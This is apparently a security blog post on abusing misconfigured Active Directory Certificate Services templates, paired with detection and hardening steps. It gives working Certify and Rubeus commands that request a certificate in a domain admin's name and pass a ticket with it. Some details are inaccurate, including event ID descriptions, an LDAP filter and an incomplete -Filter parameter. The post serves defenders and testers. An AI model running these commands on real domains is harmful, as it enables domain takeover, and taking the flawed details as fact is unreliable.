Listen to this Post

Introduction:
Active Directory Certificate Services (ADCS) has become a critical pillar in modern enterprise security, providing the PKI backbone for everything from user authentication to digital signatures. However, this central role also makes it a prime target for attackers. A technique dubbed “ADIOS” demonstrates how abusing misconfigured certificate templates can lead to instant domain compromise, bypassing traditional security controls and leaving organizations vulnerable to complete takeover.
Learning Objectives:
- Understand the critical vulnerability posed by misconfigured ADCS certificate templates
- Learn to identify and exploit vulnerable templates using offensive security tools
- Implement defensive measures and monitoring to detect ADCS-based attacks
You Should Know:
- The ADCS Attack Surface: Understanding Certificate Template Abuse
The ADIOS technique exploits certificate templates that allow low-privileged users to enroll in certificates with excessive privileges. Specifically, when a template has the `ENROLLEE_SUPPLIES_SUBJECT` setting enabled and overly permissive security descriptors, attackers can request certificates with arbitrary Subject Alternative Names (SANs), including those of domain administrators.
Step-by-step guide:
First, enumerate certificate templates and their permissions using PowerShell:
Import PowerView module Import-Module .\PowerView.ps1 Get certificate templates Get-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -LDAPFilter "(objectclass=pkicertificatetemplate)"
Check for templates with enrollee-supplied subjects:
Check for dangerous configuration Get-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -LDAPFilter "(&(objectclass=pkicertificatetemplate)(mspki-enrollment-flag=1))"
2. Weaponizing Certify for Domain Escalation
Certify is the primary tool for identifying and exploiting vulnerable certificate templates. It automates the process of finding templates that can be abused for privilege escalation.
Step-by-step guide:
Download and compile Certify from GitHub, then run enumeration:
Enumerate vulnerable templates .\Certify.exe find /vulnerable Request certificate for domain admin .\Certify.exe request /ca:CA-SERVER\CA-NAME /template:VULNERABLE-TEMPLATE /altname:DOMAIN\DomainAdmin
Once you have the certificate, convert it to PFX format and use it with Rubeus:
Request TGT using the certificate .\Rubeus.exe asktgt /user:DomainAdmin /certificate:admin.pfx /ptt
- Detection and Monitoring: Finding the Needle in the Haystack
Defending against ADCS attacks requires comprehensive monitoring of certificate services. Windows Event Logs provide crucial evidence of malicious enrollment activities.
Step-by-step guide:
Monitor these critical Event IDs:
- Event 4886/4887: Certificate services template load configuration
- Event 4896: Certificate services request attribute
- Event 4897: Certificate services issued certificate
PowerShell query for suspicious certificate requests:
Query certificate services logs
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4897} |
Where-Object {$_.Message -like "Template Name: VulnerableTemplate"}
4. Hardening Certificate Template Permissions
Proper configuration of certificate templates is the first line of defense. Remove dangerous settings and apply principle of least privilege.
Step-by-step guide:
Using certtmpl.msc, navigate to certificate templates and:
- Disable `ENROLLEE_SUPPLIES_SUBJECT` flag
- Remove Authenticated Users from enrollment permissions
- Restrict enrollment to specific security groups only
PowerShell automation for template auditing:
Audit template permissions Get-ADObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -Filter -Properties msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, ntSecurityDescriptor | Select-Object Name, msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag
5. Implementing Certificate Authority Auditing
Enable comprehensive CA auditing to track all certificate issuance and configuration changes.
Step-by-step guide:
On each Certificate Authority server:
1. Open Certification Authority console
2. Right-click CA name → Properties
3. Auditing tab → Enable all audit events
- Configure SACL for CA object in Active Directory
Group Policy configuration:
Enable detailed certificate services auditing auditpol /set /subcategory:"Certification Services" /success:enable /failure:enable
6. Emergency Response: Revocation and Containment
When compromise is detected, immediate revocation of malicious certificates is crucial to prevent further damage.
Step-by-step guide:
In the Certification Authority console:
1. Expand Issued Certificates
- Find suspicious certificates (recently issued to unusual principals)
3. Right-click → All Tasks → Revoke Certificate
4. Publish updated CRL immediately
PowerShell revocation command:
Revoke certificate by serial number certutil -config "CA-SERVER\CA-NAME" -revoke "SERIALNUMBER"
7. Advanced Hardening: Implementing Certificate Manager Approval
For high-value templates, implement manager approval workflow to prevent automatic certificate issuance.
Step-by-step guide:
In Certificate Templates console:
1. Duplicate existing template
- Security tab → Remove Enroll permission from users
- Add required users to Read and Enroll permissions
- Enable “CA certificate manager approval” in Issuance Requirements
Registry modification for enhanced logging:
Enable verbose ADCS logging New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\CertSvc\Configuration\CA-NAME" -Name "Debug" -Value 1 -PropertyType DWORD
What Undercode Say:
- ADCS attacks represent a paradigm shift in domain persistence, allowing attackers to maintain access even after password resets
- The simplicity of exploitation combined with the difficulty of detection makes this one of the most dangerous attack vectors in modern enterprise environments
- Organizations must move beyond traditional perimeter defense and implement certificate-focused security monitoring
The ADIOS technique demonstrates how architectural trust components can become attack vectors when misconfigured. Unlike traditional credential theft, certificate-based attacks provide persistent, often undetectable access that survives typical security measures. The fact that a single PowerShell command can lead to domain compromise highlights the critical importance of proper PKI governance. As enterprises increasingly rely on certificate-based authentication for cloud services and zero-trust architectures, the attack surface will only expand, making comprehensive ADCS security not just recommended but essential for survival.
Prediction:
ADCS-based attacks will rapidly evolve from targeted advanced persistent threats to commonplace exploitation as tooling becomes more accessible. Within 18-24 months, we predict certificate template abuse will become as prevalent as Golden Ticket attacks are today. The migration to cloud-based PKI services may introduce new attack vectors while potentially reducing some traditional ADCS risks. Organizations that fail to implement certificate lifecycle management and monitoring will face inevitable compromise, as attackers increasingly recognize that certificates often provide more reliable persistence than traditional credentials in modern defense environments.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Cybersecsloth Adios – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


